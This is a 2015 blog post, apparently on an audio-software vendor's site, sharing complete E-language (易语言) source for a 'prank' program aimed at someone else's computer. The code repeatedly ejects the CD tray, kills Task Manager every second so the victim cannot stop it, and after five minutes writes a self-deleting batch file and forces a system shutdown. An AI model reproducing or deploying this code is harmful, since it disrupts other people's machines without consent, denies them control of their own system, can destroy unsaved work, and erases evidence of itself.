DJ音乐盒 | 外置伴侣 | MC词宝盒| SAM机架 | kx3552驱动

一键电音、kx驱动,主播音效软件商业定做

野狼音频科技

咨询QQ:136677098

野狼音频科技软件园

易语言源码--简单调戏别人电脑

作者:野狼音频科技   时间:2015-02-07    浏览:

.版本 2
.支持库 xplib
.支持库 eAPI
.支持库 shell

.程序集 窗口程序集1

.子程序 __启动窗口_创建完毕

XP风格 (3)
时钟3.时钟周期 = 10
时钟4.时钟周期 = 1000

.
.如果真结束
时钟1.时钟周期 = 2000
时钟2.时钟周期 = 1000

.子程序 _时钟1_周期事件

弹出光驱 ()
延时 (500)
关闭光驱 ()

.子程序 _时钟2_周期事件

终止进程 (“taskmgr.exe”)


.子程序 _时钟3_周期事件 ‘窗口扩散

_启动窗口.宽度 = _启动窗口.宽度 + 1
图片框1.宽度 = _启动窗口.宽度 - 1
_启动窗口.高度 = _启动窗口.高度 + 1
图片框1.高度 = _启动窗口.高度 - 1
.如果真 (_启动窗口.宽度 > 300)

    _启动窗口.位置 = 3
    图片框1.宽度 = _启动窗口.宽度 - 3
    图片框1.高度 = _启动窗口.高度 - 3
    时钟3.时钟周期 = 0
.如果真结束


.子程序 _时钟4_周期事件 '300秒后重启并自我毁灭

time = time + 1
.如果真 (time = 300)
    信息框 (“hahahaha” + #换行符 + “请重启”, 0, “ghost”)
    写到文件 (“c:\Del.bat”, 到字节集 (“echo wscript.sleep 1 >%temp%\delay.vbs&&%temp%\delay.vbs&&del /q %temp%\delay.vbs” + #换行符 + “del” + “ ” + 取执行文件名 () + #换行符 + “del” + “ ” + “%0”))
    销毁 ()
    关闭系统 (2, 真)
    运行 (“c:\Del.bat”, 假, 1)
    结束 ()

 

notice
请先画一个图片框,再画4个时钟,图片随你放

野狼音频科技软件园